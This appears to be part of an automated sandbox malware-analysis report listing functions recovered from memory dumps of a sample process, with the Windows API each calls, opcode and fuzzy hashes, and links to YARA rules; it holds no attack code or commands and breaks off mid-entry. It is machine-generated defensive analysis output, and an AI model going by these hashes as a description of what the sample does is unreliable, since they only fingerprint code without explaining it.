Function 37049988 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37049A0F

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b769139b3f8157a63e575d7013cff81086084f2fcae74f3c87cda01f1b276e51
Instruction ID: 470d7437ee3f85529e6428b14aa7271978977241f0b853908dd7d1100712d1f4
Opcode Fuzzy Hash: b769139b3f8157a63e575d7013cff81086084f2fcae74f3c87cda01f1b276e51
Instruction Fuzzy Hash: 1D21D8B5D00248AFDB10CFAAD984ADEFBF4FB48310F14845AE954A3311D374A954CFA5

Function 3704EE50 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004B), ref: 3704EE9D

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5e96d0189d0b56acfbe4c9daa0036eee62a8f82fa7252052f7cd34b2f7db9269
Instruction ID: 4c65ee1e2517267f747a4c634b547e5f712c2b1f3862e2d2d8a961812513fa7c
Opcode Fuzzy Hash: 5e96d0189d0b56acfbe4c9daa0036eee62a8f82fa7252052f7cd34b2f7db9269
Instruction Fuzzy Hash: 742136B4404384CFEB10CFA2D8403A9BFF1EB45328F1040AEC59DA7692C779A695CF56

Function 3704EF5B Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 3704EFD6

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 98815473ea8b048fc3ad2204257e182e20cccdaa5ada25cf25abe0b336e37a4c
Instruction ID: e3daef6e2123ced45008bc102c1e5aa06f39ed4ac51a833609071f55acc2fe88
Opcode Fuzzy Hash: 98815473ea8b048fc3ad2204257e182e20cccdaa5ada25cf25abe0b336e37a4c
Instruction Fuzzy Hash: E32110B9C016499FDB10CF9AC884ADEFBF4FB89220F90856EE419A7600C374A544CFA1

Function 3704D84C Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 3704EFD6

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 34208be73cd6447166650b6e47e525f3946cf0f7084d1d84ca73592d01ee48be
Instruction ID: c16adc1900faacbbeea46de4f644d10d52dda4f16eefcb0ee067bf27d58654aa
Opcode Fuzzy Hash: 34208be73cd6447166650b6e47e525f3946cf0f7084d1d84ca73592d01ee48be
Instruction Fuzzy Hash: 5D2102B5D007499FDB10CF9AC884A9EFBF4BB49220F90856EE419B7600C374A544CFA1

Function 37138F13 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 37138F6D

Memory Dump Source

Source File: 00000002.00000002.43481282332.0000000037130000.00000040.00000800.00020000.00000000.sdmp, Offset: 37130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37130000_Fac.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a40eca2f57c96001a8f8a305f72a1269ffafb5d854b6026d1af9f7a5703fb404
Instruction ID: 789d1f400e3b17c95db04aa6deab962a422084ab62bde5c856e3da680227022b
Opcode Fuzzy Hash: a40eca2f57c96001a8f8a305f72a1269ffafb5d854b6026d1af9f7a5703fb404
Instruction Fuzzy Hash: A91148B5C043489FDB10CFAAC484BDEBFF8EB58324F14845AE459A7600C374A944CFA5

Function 371380A8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 37138F6D

Memory Dump Source

Source File: 00000002.00000002.43481282332.0000000037130000.00000040.00000800.00020000.00000000.sdmp, Offset: 37130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37130000_Fac.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e0b7377462d81a67a83893cb34ac7fe6e3a164f60c3c5d5ed708ad3af10eba44
Instruction ID: 3a448e07a243afdf816ee73664059344fe582dac78add7b670de6106998bec8d
Opcode Fuzzy Hash: e0b7377462d81a67a83893cb34ac7fe6e3a164f60c3c5d5ed708ad3af10eba44
Instruction Fuzzy Hash: 711148B5D043489FDB20DFAAD444B9EFBF8EB58220F10841AE418A7700C374A940CFA5

Function 00152790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

F, xrefs: 001527BF

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-2730988801
Opcode ID: df2fb7fb2115032a8dced24f5767732a3df0eb69174d3f490edd608290ed7051
Instruction ID: c39cd53bd36d514ec856e7a686c1d5ccee7bb4fb718e4a150d30fac044e42b41
Opcode Fuzzy Hash: df2fb7fb2115032a8dced24f5767732a3df0eb69174d3f490edd608290ed7051
Instruction Fuzzy Hash: 6B313C35D093898FCB01DFB4D8146EDBFB4EF4A300F0401AAD445AB265EB351989CBA1

Function 0015E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d0da8c3273febb3da4b1988a698edab5d74c646e896a360d55c83d0a4d5c99
Instruction ID: 5aee7cac2de18ff30bdc6e8e1efe2cc77ee81efe7716f2d82e005725fe0fb3ee
Opcode Fuzzy Hash: 47d0da8c3273febb3da4b1988a698edab5d74c646e896a360d55c83d0a4d5c99
Instruction Fuzzy Hash: 6F129835065646CFA2502B70EDAC12BBBF1FB1F32B7546CA8F10FC58659B3144C9CA62

Function 00159A10 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac791b59f5dcef3e8f4767ee186c73a9f5d9a1700bb5cd5876fac4845d393235
Instruction ID: d105067f3d948ffb9961bf0943d7b88e22b6b6d427befc00e96e7bdcff2cf167
Opcode Fuzzy Hash: ac791b59f5dcef3e8f4767ee186c73a9f5d9a1700bb5cd5876fac4845d393235
Instruction Fuzzy Hash: 36810730505745DFC711CF28C8808AABBB6EF81321715C6AADC65DF296D331EC5ACBA2

Function 001580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a21cb6191a09a4c9ac3ae84f3b086930f08e2c7c4c090bb533365792e8980c2
Instruction ID: c3f64d8ca7f505ddc0f57a759ed506e283782801d4f93c8e66c22ef48c1832fa
Opcode Fuzzy Hash: 8a21cb6191a09a4c9ac3ae84f3b086930f08e2c7c4c090bb533365792e8980c2
Instruction Fuzzy Hash: 3B71F634700A05CFCB15DF69C884A6A7BE6AF99342F1540A9E826EF371DB70DC46CB50

Function 36FDD703 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb6d9fc46747c0fd31c85777d729353ab6444dd5f11f03b99e2b21ac0d3d282
Instruction ID: 657e57e9a5da88ae44d441160dd8d6ae01357fdd93a6925aa3fb71ddd62aa4ae
Opcode Fuzzy Hash: abb6d9fc46747c0fd31c85777d729353ab6444dd5f11f03b99e2b21ac0d3d282
Instruction Fuzzy Hash: 2F819074E412688FDB65DF29D990BDDBBB2BF89300F1481EAD849A7264DB305E81CF44

Function 37007D20 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a75d05cde3b2bc50666be237fb4ed1bfa90734ac114755e9c9ffafddb2b618
Instruction ID: 9e668cf2aee2faa8d6efe378580605aa0c9195c3ce8c66762e2f2400902847c4
Opcode Fuzzy Hash: 17a75d05cde3b2bc50666be237fb4ed1bfa90734ac114755e9c9ffafddb2b618
Instruction Fuzzy Hash: 4D719174E012088FEB14DFA5C850AEDBBB2FF89300F649129D414BB395DB39A942CF55

Function 37001CF0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93857991e1ad08a0111fa86aad18a52d9e952a48d4671acd45d3fc6cc4704d44
Instruction ID: d5064ca13ac42048e34675c92f95301a4e59a547b04c5434a59768cfbb7337ad
Opcode Fuzzy Hash: 93857991e1ad08a0111fa86aad18a52d9e952a48d4671acd45d3fc6cc4704d44
Instruction Fuzzy Hash: 8171AF79E002089FEB54DFA5C890AEDBBB2FF89300F648129D414BB395DB35A942CF55

Function 36FDD410 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9678721a4fa23e6a34230129ef618f478660708cd7780514fb3ae7aeba0399
Instruction ID: 9dbc56aadd442c9c5acb3aaf23b8c9299c496ca124705c9c77572fac996b1560
Opcode Fuzzy Hash: 3c9678721a4fa23e6a34230129ef618f478660708cd7780514fb3ae7aeba0399
Instruction Fuzzy Hash: 3771BE74E00208CBEB14DFA5C890A9DBBB2FF89300F648529D418BB368DB35A946CF55

Function 36FD73E0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13083cff3b34b43b80ae02c7bc39103e8fa6c93e38886af2c01b0dc93298e3bf
Instruction ID: 6edf01c7a7ca44c7784e1beb1db051a3f58afc539776e9bd190bfc8fb17198e7
Opcode Fuzzy Hash: 13083cff3b34b43b80ae02c7bc39103e8fa6c93e38886af2c01b0dc93298e3bf
Instruction Fuzzy Hash: 2571BF75E00218CBEB14DFA5C890ADDBBB2FF89300F64852AD414BB368DB35A946CF55

Function 0015F720 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4d2da6166f72d3b24fcefbc09209d0eba8e35a9b85063110350833b3223ded
Instruction ID: 7a934dfe6e10f664aee661666bdf3221a64d8984abff3a86867eb3a1b622d75e
Opcode Fuzzy Hash: 2b4d2da6166f72d3b24fcefbc09209d0eba8e35a9b85063110350833b3223ded
Instruction Fuzzy Hash: 8C61DF78D01318DFDB14DFA5C854BADBBB2FF88304F208129E809AB2A5DB355A46CF41

Function 36FDE6F0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ad3b7bf3aa03c8ed920ec33de2e567a33716e69f9c9b3d9104288809137d9b
Instruction ID: 937fbf6eb84871128d5c76aa6d5ccfef74cdc6d3f52ee65c5168fae47176aa36
Opcode Fuzzy Hash: 10ad3b7bf3aa03c8ed920ec33de2e567a33716e69f9c9b3d9104288809137d9b
Instruction Fuzzy Hash: 83512975A08325DFE718DF28C89492A37B2FB58718B594864E815EB3A8CB30FC55CB90

Function 36FDEE2B Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3fe8c4874a84b2b5718749531cd2b2267b3213f9604a0e1ec4d46c3f3fd7ce2
Instruction ID: 78942cecb5cfc39b516cd1da333c7f3301f0025aa365b4536e7cb6ad79e5098d
Opcode Fuzzy Hash: b3fe8c4874a84b2b5718749531cd2b2267b3213f9604a0e1ec4d46c3f3fd7ce2
Instruction Fuzzy Hash: 0961AE74E012289FEB65DF69DC51BDDBBB2AF89300F5081A9D50DA7264EB305E81CF44

Function 0015D141 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b0b9d00ce88083f279cff9018a020bcdd5ff9f76f59896e1d07faa80539493
Instruction ID: e8d4778d177f5ae8859462931b257021e097bf396cf653b25803ca2f8de3de98
Opcode Fuzzy Hash: 00b0b9d00ce88083f279cff9018a020bcdd5ff9f76f59896e1d07faa80539493
Instruction Fuzzy Hash: 51519374E01208DFDB54DFA9D994ADDBBF2BF89300F248169E415AB365DB31A905CF10

Function 001541A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dedbcf893e81d149dc148406faa7d3c1a2840922cf4c1ac4db46a528fac22f20
Instruction ID: a3cbfec658c51a1c54f342867acb18b219278beb8a9feae74b25d6e6d82def63
Opcode Fuzzy Hash: dedbcf893e81d149dc148406faa7d3c1a2840922cf4c1ac4db46a528fac22f20
Instruction Fuzzy Hash: 75518E78E01308CFDB48DFA9D58499DBBB2FF89311B208069E815AB364DB35A846CF54

Function 0015A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a397b7c277ccbe63cd58268e15e6a883e6a3061557044eb4eafe223b3aca10d
Instruction ID: 466a8f3bb229ee7899d4fe245bb8bb71e743ac942d4051cc96fe2584460c2ef7
Opcode Fuzzy Hash: 9a397b7c277ccbe63cd58268e15e6a883e6a3061557044eb4eafe223b3aca10d
Instruction Fuzzy Hash: A841DD31A44248CFCF15CFA4C844AADBFB2FF49316F048255E9259F2A1D370E958CB62

Function 36FDFB2B Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6042744213af0360fa1d020d1312961fa35fd1c6297349997edbf63097c35f
Instruction ID: 7d5466227a7c64a1a42f341d8e117bd38541ea1d68168e15f6f9eb1dd67f2e09
Opcode Fuzzy Hash: cf6042744213af0360fa1d020d1312961fa35fd1c6297349997edbf63097c35f
Instruction Fuzzy Hash: 0641BC78D013198FDB14CFA5C894BEDBBF1BB48300F14852AD805B72A8DB38AA46CB54

Function 36FDFB38 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3706074ecdcfe624176b8a9578ea43a69489d17f51ea18d1eb0f425714da8921
Instruction ID: 95db5b3cfe4b7128dfa4c94c79b402a272d678bafb936044f8be7c8c88dcb421
Opcode Fuzzy Hash: 3706074ecdcfe624176b8a9578ea43a69489d17f51ea18d1eb0f425714da8921
Instruction Fuzzy Hash: FC41AC78E012188FDB14CFA9C994BDDBBF1FB48301F14842AD805B72A8DB386A46CB54

Function 00159C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a480c6ab38c4b9e9e7efe941ec3a79279536c7845f1d8e9efcb077b7cc34f520
Instruction ID: f97794cc001a5d0a151114347b674d9a55d97ff3a05ea1d30f319ecaebe14cc2
Opcode Fuzzy Hash: a480c6ab38c4b9e9e7efe941ec3a79279536c7845f1d8e9efcb077b7cc34f520
Instruction Fuzzy Hash: A2416D30604245CFDB00CF68C844B6A7BF6EF89316F598466E918CF255D775DC46CBA2

Function 37001CE3 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a54ed0c0ff0f3800840889c84a7990f1286f0b9cf63ca7a746853852527d3f3
Instruction ID: 4bb339d293c178dcab75303a0cfe6cfad38e243ef644da12736a452f249c5d82
Opcode Fuzzy Hash: 9a54ed0c0ff0f3800840889c84a7990f1286f0b9cf63ca7a746853852527d3f3
Instruction Fuzzy Hash: 31310574E002088FEB18CFAAD9506EDBBF2AF89300F24D56AD418BB358DB345902CF54

Function 37007F98 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84cf0f62db47cbe87edcf88f4aaf3044d00da13e7b5c508840d4118d1b66ac5
Instruction ID: 42c9ef368cd48422bdadf4ba4949e0d954b96af80833dd1c1410608d19145004
Opcode Fuzzy Hash: f84cf0f62db47cbe87edcf88f4aaf3044d00da13e7b5c508840d4118d1b66ac5
Instruction Fuzzy Hash: F331E075E016088BEB58CFAAD8506EDFBF2BF89300F20D12AC418BB294DB345906CF54

Function 00155658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1669b86f6d1642be019b1dcbd61b0a019f76e02f3b0cb1bd419706d1b11aa237
Instruction ID: 96c1190a8882ea9257bff8eb0bae9f4e2967df90e8e6bdfd8104ac7d45d94c0d
Opcode Fuzzy Hash: 1669b86f6d1642be019b1dcbd61b0a019f76e02f3b0cb1bd419706d1b11aa237
Instruction Fuzzy Hash: 5D316E31304149DFCF059F64D9A5AAE3BB6EB88301F508024FD299B255CB35DEA6DBA0

Function 36FD70AF Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85b62c7b88c4833d4f6aee4c64a6e56bdb49a6dc2898134d12af3bc9862819b
Instruction ID: de078fd005b2ad576ad5e2e0b1628b56c694513d7f87eb5ad4570e43a83f35a3
Opcode Fuzzy Hash: f85b62c7b88c4833d4f6aee4c64a6e56bdb49a6dc2898134d12af3bc9862819b
Instruction Fuzzy Hash: 4631F175E00218CBEB18CFAAD8546DDBBF2BF89300F24D52AD408BB258EB345906CF54

Function 36FD73CF Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f35fac0daa4f4c847f48dce1cd14e2a09db64e7d3648643b8b803766d05f49a
Instruction ID: 237f08c1002c314d070ddf17cca9c83c9d1bec2d22d2d9b39515735352258022
Opcode Fuzzy Hash: 8f35fac0daa4f4c847f48dce1cd14e2a09db64e7d3648643b8b803766d05f49a
Instruction Fuzzy Hash: 2A310475D053488BDB09CFBAC8546DDBBF2AF8A300F24952AC408BB258EB345906CF54

Function 36FDD400 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ca89166543fbc85e42e2ef0105594aa5e169cdb82d6756958290fcd35e988d
Instruction ID: be1deb06e9e746dd19fd2c7e3a2d21546a725dc9c916c733f1d6e40470ce25e6
Opcode Fuzzy Hash: 53ca89166543fbc85e42e2ef0105594aa5e169cdb82d6756958290fcd35e988d
Instruction Fuzzy Hash: 3F31D475E05208CFDB18DFAAC9506DDBBF2AF8A300F24D52AC418BB258DB356946CF54

Function 36FDE588 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f21cefcdf5a24ca0ce5b3625ac5f5a354837477904ccf2f15b0373a4e894fbc
Instruction ID: 9fcf224dbd295782168d919c78fb437b78151bff5e9d7876b122c0b518af1c07
Opcode Fuzzy Hash: 1f21cefcdf5a24ca0ce5b3625ac5f5a354837477904ccf2f15b0373a4e894fbc
Instruction Fuzzy Hash: BE21BB75D183668FEB029738C8805AD7F31AF4335875C4E66D511D729ADB30EC41CBA2

Function 3700F978 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54bf5107fb3c57a1a7a27e49d7238f17397afbfb56869e9f2f3762fdc0e8c9ad
Instruction ID: b86ed12c61a4a7bfec01abfc3bc8d7dc5931aa145eed5c5bb05320a24ebb8e50
Opcode Fuzzy Hash: 54bf5107fb3c57a1a7a27e49d7238f17397afbfb56869e9f2f3762fdc0e8c9ad
Instruction Fuzzy Hash: 7231D274E01608CBEB18CFAAD8506EDBBF2BF89300F60D46AD458BB258DB355906DF54

Function 3700F65D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8725c7b52c4854f0183a7588cc18fd3cfd081eeca4d6d7c82ba5bf414bbc01ec
Instruction ID: 5f81188a5e3312ae5d2d51473326b4af718b642146981144d79c5abdf0b5a13c
Opcode Fuzzy Hash: 8725c7b52c4854f0183a7588cc18fd3cfd081eeca4d6d7c82ba5bf414bbc01ec
Instruction Fuzzy Hash: 6931E175E01608CBEB18CFAAD8406EDBBF2BF89300F20D12AD418BB258DB345946DF55

Function 37007D11 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b29229db1e51e631107acda85a1c2271e2df63c36713181970ba3aa98e576b
Instruction ID: 04905cb4e2273c200f3c0b5fa0de424060495023f9d172af287b2048055998f0
Opcode Fuzzy Hash: a7b29229db1e51e631107acda85a1c2271e2df63c36713181970ba3aa98e576b
Instruction Fuzzy Hash: AE31B575E016088BEF18DFAAC9446EDFBF2AF89300F64D42AD418BB254DB356942CF54

Function 00158370 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea851e25d642ff1560b002f1b251079687d16e40dcb6cfed3ed9f4bff2e1dd76
Instruction ID: 125d9216d5fc0bcc3ea6b5f0b2348e7ebaa4fb6792975d6b1c2cb795d435a09d
Opcode Fuzzy Hash: ea851e25d642ff1560b002f1b251079687d16e40dcb6cfed3ed9f4bff2e1dd76
Instruction Fuzzy Hash: 7B212130304242CBDB255B798854B7E36E6AFC070A7194039DC16EF6A5EF25CC4BD3A2

Function 00159920 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bc378642e9d7cb000c94790168bd80a1d24c31e3243dc4486cefae35675c2f
Instruction ID: a194648ebbe2ba37049d12ff90b58edc5efc0aac99774b514d70c6d3ff89415f
Opcode Fuzzy Hash: 16bc378642e9d7cb000c94790168bd80a1d24c31e3243dc4486cefae35675c2f
Instruction Fuzzy Hash: 4D31B131401B05DFC714CB29C880551BBB6AF8237E315835AC8B98F6D6D731E85AC7D2

Function 00158380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0904b9aafe9088c52640de71fbb88a60afb84a82410b5ffc9e958a276d1ef2ec
